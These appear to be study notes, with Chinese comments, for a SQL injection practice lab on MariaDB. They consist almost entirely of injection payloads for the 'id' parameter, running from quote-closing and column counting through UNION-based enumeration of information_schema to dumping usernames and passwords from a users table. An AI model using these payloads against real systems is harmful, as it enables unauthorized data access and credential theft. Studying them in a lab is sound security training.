

#You have an error in your SQL syntax; check the manual that #corresponds to your MariaDB server version for the right #syntax to use near ''1'' LIMIT 0,1' at line 1
#''1'' LIMIT 0,1'表明1'闭合了前面的',LIMIT 0,1'需要被注释
# MariaDB server显示数据库信息

id=1' --+
#②-- (前面有空格)URL中空格需要转义--+或者--%20

id=1' order by 4 --+
#Unknown column '4' in 'order clause'

id=1' and 1=2 union select 1,2,3 --+

id=1' and 1=2 union select 1,version(),database() --+

id=1' and 1=2 union select 1,group_concat(schema_name),3 from information_schema.schemata--+ 

id=1' and 1=2 union select 1,group_concat(table_name),group_concat(table_schema) from information_schema.tables--+

id=1' and 1=2 union select 1,table_name,group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273--+ 

id=1' and 1=2 union select 1,2,concat_ws(0x2b,username,password) from users--+
